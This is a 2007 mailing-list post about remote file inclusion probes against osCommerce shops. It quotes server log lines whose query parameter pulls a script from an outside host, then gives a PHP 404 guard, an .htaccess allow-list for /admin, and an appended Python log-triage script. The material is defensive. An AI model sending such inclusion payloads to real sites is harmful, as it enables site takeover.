[Tep-j-general] include_once attack


hamada bungu****@leo*****
October 16, 2007 (Tue) 16:59:39 JST


Hello.

Today, for some reason,

> 2007/10/16,14:46:16,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:17,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",403,811,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:18,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:18,193.25.197.92,"www32.celeonet.fr","-",GET,"/catalog/default.php/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
> 2007/10/16,14:46:22,209.31.123.186,"209.31.123.186.ptr.us.xo.net","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.808"
> 2007/10/16,14:46:23,209.31.123.186,"209.31.123.186.ptr.us.xo.net","-",GET,"/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",403,822,"-","","libwww-perl/5.808"
> 2007/10/16,14:46:23,209.31.123.186,"209.31.123.186.ptr.us.xo.net","-",GET,"/catalog/default.php/catalog/includes/include_once.php","include_file=http://qlzr.iespana.es/safe.txt?","1.1",404,5,"-","","libwww-perl/5.808"

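↑ A flood of requests like these came in. From many IPs, all at once.

osC has no file called include_once.php, so this attack will not succeed,
but if these are called simultaneously in large numbers as arguments to
default.php or product_info.php, they could cause an explosive DB load, so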

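> // Return 404 if the request contains /images/ or include
> // (strpos replaces ereg, which was removed in PHP 7; same substring match)
> if (strpos($_SERVER['REQUEST_URI'], '/images/') !== false || strpos($_SERVER['REQUEST_URI'], 'include') !== false) {
> 
> 	header("HTTP/1.0 404 Not Found");
> 	exit;
> 
> }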

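↑ it may be a good idea to embed code like this.

I had actually embedded it myself, so every one of them is getting a 404.
In practice it is a somewhat more general-purpose "defense program", though.

People (?) who search for osC and try to peek into /admin also never stop coming, so I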

/admin/.htaccess

> order deny,allow
> deny from all
> 
> allow from 122.22.**.**

generate something like this automatically with cron.

No access from anywhere but my own place. Absolutely not showing it to anyone.


Hamada
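
Added example, not part of the original post: a small log triage script for the pattern described above, which flags requests whose query parameter value is a remote URL and counts, per source IP, how many were routed to a real script through path info and how many were answered without an error. The sample lines are constructed in the same CSV layout as the quoted log (documentation IPs and example hosts), and the column positions are assumed from that layout.

```python
import csv
import io
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample in the CSV layout of the log lines quoted above
# (documentation IPs and example hosts, not real indicators).
SAMPLE_LOG = '''\
2007/10/16,14:46:16,192.0.2.10,"a.example.net","-",GET,"/catalog/default.php/cPath/catalog/includes/include_once.php","include_file=http://files.example.com/safe.txt?","1.1",404,5,"-","","libwww-perl/5.805"
2007/10/16,14:46:17,192.0.2.10,"a.example.net","-",GET,"/catalog/includes/include_once.php","include_file=http://files.example.com/safe.txt?","1.1",403,811,"-","","libwww-perl/5.805"
2007/10/16,14:46:22,198.51.100.7,"b.example.net","-",GET,"/catalog/product_info.php/catalog/includes/include_once.php","include_file=http%3A%2F%2Ffiles.example.com%2Fsafe.txt","1.1",200,5120,"-","","libwww-perl/5.808"
2007/10/16,14:47:01,203.0.113.5,"c.example.net","-",GET,"/catalog/product_info.php","products_id=12","1.1",200,20480,"-","","Mozilla/4.0"
'''

# Column positions are assumed from the sample layout.
IP, PATH, QUERY, STATUS = 2, 6, 7, 9
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_rfi_probe(query):
    """True if a query parameter value is itself a remote URL (after decoding)."""
    return any(value.strip().lower().startswith(REMOTE_SCHEMES)
               for _name, value in parse_qsl(query, keep_blank_values=True))


def summarize(log_text):
    """Per source IP: probe count, probes routed to a real script via
    path info (".php/" in the path), and probes answered without an error."""
    report = defaultdict(lambda: {"probes": 0, "path_info": 0, "served": 0})
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) <= STATUS or not is_rfi_probe(row[QUERY]):
            continue
        entry = report[row[IP]]
        entry["probes"] += 1
        if ".php/" in row[PATH]:
            entry["path_info"] += 1   # reaches default.php etc. (the DB-load case in the post)
        if int(row[STATUS]) < 400:
            entry["served"] += 1      # not blocked: review this request first
    return dict(report)


if __name__ == "__main__":
    for ip, stats in sorted(summarize(SAMPLE_LOG).items()):
        print(ip, stats)
```

A non-zero `served` count marks a probe that the 404 guard did not catch; legitimate parameters that carry URLs would need an allow-list before this is used for blocking.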



